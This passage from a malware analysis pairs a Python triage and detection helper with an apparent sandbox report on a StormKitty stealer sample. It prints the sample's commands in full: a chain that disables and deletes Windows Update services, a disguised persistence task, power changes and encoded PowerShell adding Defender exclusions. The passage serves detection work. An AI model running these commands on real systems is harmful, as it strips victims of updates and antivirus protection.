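UPDATE_KILL_CHAIN = r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
POWERCFG_CHAIN = r'"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0'
PERSISTENCE = [  # behavioral1 run: task-based persistence and the self-restart .bat
    r'schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""',
    r'schtasks /run /tn "GoogleUpdateTaskMachineQC"',
    r'TaskKill /F /IM 2632',
    r'Timeout /T 2 /Nobreak',
]

# Services whose removal breaks Windows Update and its self-repair (WaaSMedic).
SERVICES_OF_INTEREST = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
_CMD_PREFIX = re.compile(r'^"[^"]*cmd\.exe"\s+/[cC]\s+')


def split_chain(cmdline: str) -> list:
    """Drop the cmd.exe /c prefix and split a '&' chain into sub-commands."""
    body = _CMD_PREFIX.sub("", cmdline.strip())
    return [part.strip() for part in body.split(" & ") if part.strip()]


def _task_name(sub: str) -> str:
    m = re.search(r'/tn\s+"([^"]+)"', sub, re.IGNORECASE)
    return m.group(1) if m else ""


def classify(sub: str):
    """Map one sub-command to a (technique, detail) pair, or None."""
    tokens = sub.split()
    if not tokens:
        return None
    exe, rest = tokens[0].lower(), tokens[1:]
    if exe == "sc" and len(rest) >= 2 and rest[0].lower() == "stop":
        return ("service_stop", rest[1])
    if exe == "reg" and len(rest) >= 2 and rest[0].lower() == "delete":
        key = rest[1]
        if "\\services\\" in key.lower():
            # Deleting the key removes the service definition itself.
            return ("service_definition_deleted", key.rsplit("\\", 1)[-1])
        return ("registry_key_deleted", key)
    if exe == "reg" and len(rest) >= 2 and rest[0].lower() == "add":
        m = re.search(r"/v\s+(\S+)\s+/d\s+(\S+)", sub, re.IGNORECASE)
        if m and "windowsupdate\\au" in rest[1].lower():
            return ("windows_update_policy", f"{m.group(1)}={m.group(2)}")
        return ("registry_value_set", rest[1])
    if exe in ("takeown", "icacls", "rename"):
        # First non-switch argument is the file being taken over or renamed.
        target = next((t for t in rest if not t.startswith("/")), "")
        return (f"file_{exe}", target)
    if exe == "schtasks" and rest:
        verb = rest[0].lower().lstrip("/")
        if verb == "change" and "/disable" in sub.lower():
            return ("scheduled_task_disabled", _task_name(sub))
        if verb == "create":
            return ("scheduled_task_created", _task_name(sub))
        if verb == "run":
            return ("scheduled_task_run", _task_name(sub))
    if exe == "powercfg" and rest[:1] == ["/x"] and rest[-1] == "0":
        # A timeout of 0 means "never": the host will not sleep or hibernate.
        return ("power_timeout_disabled", rest[1])
    if exe == "taskkill":
        return ("process_killed", " ".join(rest))
    if exe == "timeout":
        return ("execution_delay", " ".join(rest))
    return None


def triage(cmdlines) -> dict:
    """Classify every sub-command of every command line, grouped by technique."""
    findings = {}
    for cmdline in cmdlines:
        for sub in split_chain(cmdline):
            hit = classify(sub)
            if hit is not None:
                findings.setdefault(hit[0], []).append(hit[1])
    return findings


def update_components_disabled(findings: dict) -> int:
    """Number of distinct Windows Update services stopped or deleted."""
    touched = {s.lower() for s in findings.get("service_stop", [])}
    touched |= {s.lower() for s in findings.get("service_definition_deleted", [])}
    return len(touched & SERVICES_OF_INTEREST)


if __name__ == "__main__":
    result = triage([UPDATE_KILL_CHAIN, POWERCFG_CHAIN, *PERSISTENCE])
    for technique, details in result.items():
        print(f"{technique:28} {len(details):2}  {details}")
    print("update components disabled:", update_components_disabled(result))
```

Run against the report's command lines the helper yields 24 sub-commands for the first chain and all five update-related services both stopped and deleted; a detection rule that fires on even two of these categories in one cmd.exe /c (for example `sc stop wuauserv` together with `reg delete ...\Services\wuauserv`) would catch this chain without depending on the exact ordering or on the GoogleUpdate-themed task name.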
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-12 12:40
Reported
2023-08-12 12:43
Platform
win7-20230712-en
Max time kernel
135s
Max time network
123s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry key
Modifies system certificate store
Thumbprint A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is the DigiCert Global Root CA. Windows populates this AuthRoot key through automatic root-certificate update the first time a process validates a TLS chain ending in that root, so on a fresh Windows 7 image this signature is a side effect of the sample's HTTPS traffic rather than evidence that it installed a certificate of its own.
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\rustcheat.exe
"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"
C:\Users\Admin\AppData\Local\Temp\testy.exe
"C:\Users\Admin\AppData\Local\Temp\testy.exe"
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""
C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Windows\system32\taskkill.exe
TaskKill /F /IM 2632
C:\Windows\system32\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "ofrnufvwokgx"
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
